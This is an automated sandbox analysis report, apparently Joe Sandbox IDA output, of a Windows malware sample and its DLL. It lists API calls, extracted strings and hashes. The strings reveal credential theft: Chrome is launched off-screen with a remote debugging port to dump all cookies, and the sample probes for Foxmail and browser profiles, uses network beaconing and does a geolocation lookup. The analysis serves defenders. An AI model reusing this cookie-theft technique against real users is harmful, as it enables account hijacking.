                                                                                                                                                                                                                                                                                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                                                                                                                              • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                                                                                                                              • API String ID: 672098462-2938083778
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0feae0147da29fdc9fb5b89dd403ad11d1d60950b666d48b26ed45fec73170a2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6579ff7314ed2f384524053302811614352e9b8eeb16caf2f372e99efc7b1249
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0feae0147da29fdc9fb5b89dd403ad11d1d60950b666d48b26ed45fec73170a2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5781D379A5035CAAEB20DBA4DC49FDE7339EF84B00F0005A6F50DE7190EAB55A84CF95

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • select.WS2_32(00000000,00000000,00000000,00000000,?), ref: 100086FE
                                                                                                                                                                                                                                                                                                                              • select.WS2_32(?,00000001,00000000,00000000,?), ref: 10008792
                                                                                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,000005DC,00000000), ref: 100087C5
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100087D2
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100087DF
                                                                                                                                                                                                                                                                                                                              • send.WS2_32(?,?,?,00000000), ref: 1000885F
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10008871
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 1000887A
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$select$recvsend
                                                                                                                                                                                                                                                                                                                              • String ID: Connection closed!$Connection error!
                                                                                                                                                                                                                                                                                                                              • API String ID: 4255854023-2305758303
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0d46c3478e19c6e22f50249a8fdc4e20d53f2accd10c7bd4b9f27cd91464bd76
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ed442c2dc6cb281fd35b63cc094b2b61bff5b4e8b3b3f7628600f1f37b8170a4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d46c3478e19c6e22f50249a8fdc4e20d53f2accd10c7bd4b9f27cd91464bd76
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56719272A0060AAFE704DF64CC89B59B7B8FF54380F548226E549D6A55DB70FA90CF90

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100076D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007722
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100076D0: Process32FirstW.KERNEL32(00000000,?), ref: 10007744
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100076D0: CloseHandle.KERNEL32(00000000), ref: 1000774F
                                                                                                                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,?,?,?,?), ref: 1000279E
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,100278DE,00000000,?,?,?,?), ref: 100028D2
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 10002A9D
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?), ref: 10002AAB
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 10002ABA
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 10002ABF
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • localhost, xrefs: 1000296F
                                                                                                                                                                                                                                                                                                                              • {"id":2,"method":"Browser.close"}, xrefs: 10002A3B
                                                                                                                                                                                                                                                                                                                              • {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 10002962
                                                                                                                                                                                                                                                                                                                              • localhost, xrefs: 10002A48
                                                                                                                                                                                                                                                                                                                              • --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 10002737
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseHandle$CreateProcess$FirstObjectProcess32SingleSleepSnapshotTerminateToolhelp32Wait
                                                                                                                                                                                                                                                                                                                              • String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$localhost$localhost${"id":1,"method":"Network.getAllCookies","params":{}}${"id":2,"method":"Browser.close"}
                                                                                                                                                                                                                                                                                                                              • API String ID: 3739829977-2677655338
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b7291dcf0f11a0abeade25543faf2ee7211ea1fae0703eca66f1e80ae6bb4c5a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 11f8c4d24fe82a6f86681b1c4a37eeeb5123bf1d696f215f8944f13cdd62a5a1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7291dcf0f11a0abeade25543faf2ee7211ea1fae0703eca66f1e80ae6bb4c5a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DC1E974D00248DEFF15DBA4DC85BEEBBB5EF05384F108159E40AA325ADB316E45CB62

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • connect.WS2_32(?,007E5980,00000010), ref: 004042A5
                                                                                                                                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                                                                                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                                                                                                                                                              • API String ID: 994465650-2151626615
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a4e18afe933675d0407cf742d47b00e7b2d874d83016cd3d108ad56ba9ad3496
                                                                                                                                                                                                                                                                                                                              • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4e18afe933675d0407cf742d47b00e7b2d874d83016cd3d108ad56ba9ad3496
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                                                                                                                                                                                                              • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3658366068-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              control_flow_graph 1738 40c89e-40c8c3 call 401e52 1741 40c8c9 1738->1741 1742 40c9ed-40ca85 call 401e07 GetLongPathNameW call 403b40 * 2 call 40cc37 call 402860 * 2 call 401e13 * 5 1738->1742 1743 40c8d0-40c8d5 1741->1743 1744 40c9c2-40c9c7 1741->1744 1745 40c905-40c90a 1741->1745 1746 40c9d8 1741->1746 1747 40c9c9-40c9ce call 43ac1f 1741->1747 1748 40c8da-40c8e8 call 41a75b call 401e18 1741->1748 1749 40c8fb-40c900 1741->1749 1750 40c9bb-40c9c0 1741->1750 1751 40c90f-40c916 call 41b16b 1741->1751 1753 40c9dd-40c9e2 call 43ac1f 1743->1753 1744->1753 1745->1753 1746->1753 1759 40c9d3-40c9d6 1747->1759 1771 40c8ed 1748->1771 1749->1753 1750->1753 1763 40c918-40c968 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1751->1763 1764 40c96a-40c9b6 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1751->1764 1765 40c9e3-40c9e8 call 4082d7 1753->1765 1759->1746 1759->1765 1777 40c8f1-40c8f6 call 401e13 1763->1777 1764->1771 1765->1742 1771->1777 1777->1742
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LongNamePath
                                                                                                                                                                                                                                                                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                                                                                                                                                              • API String ID: 82841172-425784914
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b30252eb1cb3c0481423ff18967e2180ec7fecba35bd7cbbc495df7c3b0763b3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b30252eb1cb3c0481423ff18967e2180ec7fecba35bd7cbbc495df7c3b0763b3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 10006845
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 10006904
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 10006A19
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: Default$Default$Profile $User Data\Default$User Data\Profile $\Default
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-1565956251
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c48fbd17205d7ba1619b983e1e753baa49308f99db8d788a119820742a600395
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a37d211fa08ad78f2eb18696fba1f90168a005bfae744a9f2f60b4d9e59cb154
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c48fbd17205d7ba1619b983e1e753baa49308f99db8d788a119820742a600395
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82A16DB4D00248DEEF01DBA4DC85BEEBBBAFF48344F208019E415E7255DB34AA45CBA1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • localhost, xrefs: 1000296F
                                                                                                                                                                                                                                                                                                                              • D, xrefs: 1000263C
                                                                                                                                                                                                                                                                                                                              • {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 10002962
                                                                                                                                                                                                                                                                                                                              • --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 10002737
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$D$localhost${"id":1,"method":"Network.getAllCookies","params":{}}
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-36197314
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c2d3aa22fbaa631a7903eb1ae554ed7ed7e75fe155870fb2b8e401e179505af5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 40ccbdec88be9962e706eaa5533df9936f7b939966369cc920347d0ed5184c3d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2d3aa22fbaa631a7903eb1ae554ed7ed7e75fe155870fb2b8e401e179505af5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8515C74D05258EEEB61CBA4CC85BDEBBB4EF14344F208199E40DA3295EB746A88CF51
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • getaddrinfo.WS2_32(?,00000010,?,?), ref: 100085F0
                                                                                                                                                                                                                                                                                                                              • FormatMessageA.KERNEL32(000012FF,00000000,00000000,00000400,1002C4F0,00000400,00000000,?,00000010,?,?), ref: 10008613
                                                                                                                                                                                                                                                                                                                              • socket.WS2_32(?,?,?), ref: 10008659
                                                                                                                                                                                                                                                                                                                              • connect.WS2_32(00000000,?,?), ref: 1000866D
                                                                                                                                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 10008679
                                                                                                                                                                                                                                                                                                                              • FreeAddrInfoW.WS2_32(?), ref: 10008689
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddrFormatFreeInfoMessageclosesocketconnectgetaddrinfosocket
                                                                                                                                                                                                                                                                                                                              • String ID: getaddrinfo: %s
                                                                                                                                                                                                                                                                                                                              • API String ID: 1733616599-4118680637
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2c738af1012253b4d1f1cfc086a1553b903a96f3a37eb19fe2757ed9f79e3473
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ba985bc0003f028ac4b4e599035e3f0603eaa92aeb31a9206ee88384ba24f580
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c738af1012253b4d1f1cfc086a1553b903a96f3a37eb19fe2757ed9f79e3473
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E411E432A01614BBFB20DBA09C45F9E73A9FB44764F210619FB69A31D0C732BA168795
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                                                                                                                                                                              • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                                                                                              • API String ID: 782494840-3211212173
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c04da24c9247c8294ecfa71116a75544abb23810716f5a1478d6322274e37ad3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c04da24c9247c8294ecfa71116a75544abb23810716f5a1478d6322274e37ad3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100078AF
                                                                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 100078D1
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 100078DC
                                                                                                                                                                                                                                                                                                                              • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 100079D8
                                                                                                                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 100079EC
                                                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 100079FA
                                                                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(?,0000022C), ref: 10007A1B
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 10007A2D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Window$CloseHandleProcess32$CreateFindFirstNextProcessShowSnapshotThreadToolhelp32
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3779799082-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 28168c6b715034a36be03b313f43d975925a8318cec7ebb959fea568e5b33c31
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2a0021c97947e2911aefd651af9cf86dd4725709f7f3ac61b73b067665f658f9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28168c6b715034a36be03b313f43d975925a8318cec7ebb959fea568e5b33c31
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6951A432E0022A9BEB21CFA4CC84BAEB7B5FF45794F214259DD19B7284D7345E42CB91
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                                                                                                                                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                                                                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                                                                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                                                                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • http://geoplugin.net/json.gp, xrefs: 0041A55E
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
